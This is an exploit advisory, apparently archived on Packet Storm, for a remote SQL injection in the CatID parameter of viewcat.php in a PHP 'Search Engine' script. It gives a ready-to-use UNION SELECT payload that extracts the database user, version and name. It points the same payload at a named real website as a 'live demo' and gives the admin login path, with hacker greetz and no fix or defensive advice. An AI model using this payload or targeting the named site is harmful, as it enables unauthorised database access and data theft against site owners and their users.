Search Engine suffers from a remote SQL injection vulnerability in viewcat.php.
7d367886141ab88ad0e6e88e78d2f987a94456e00aeeffc72616569f158aa711|___________________________________________________|
|
| Search Engine (CatID) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
| Author: Hussin X
|
| Home : WwW.Hussin-X.CoM | www.tryag.cc/cc
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : http://php.arsivimiz.com/Kategoriler/php/arama-motorlari/?P=2&K=&T=
|
| DorK : :-P
|___________________________________________________|
Exploit:
________
www.[target].com/Script/viewcat.php?&CatID=5+union+select+1,concat_ws(user(),version(),database(),0x3a,0x42595F48757373696E5F58)--
L!VE DEMO:
_________
http://www.globalpayperclick.com/viewcat.php?&CatID=5+union+select+1,concat_ws(user(),version(),database(),0x3a,0x42595F48757373696E5F58)--
____________
Admin Login :
www.[target].com/Script/login.php?redirect=?
____________
____________________________( Greetz )____________________________
|
| Hussin-X.CoM | TrYaG.cc | MiLw0rM.com
|
| DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |jiko | CraCkEr | Iraqihack
|
| | FAHD | mos_chori | str0ke |
|_________________________________________________________________
Im IRAQi
2008-08-27 WwW.Hussin-X.cOm
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed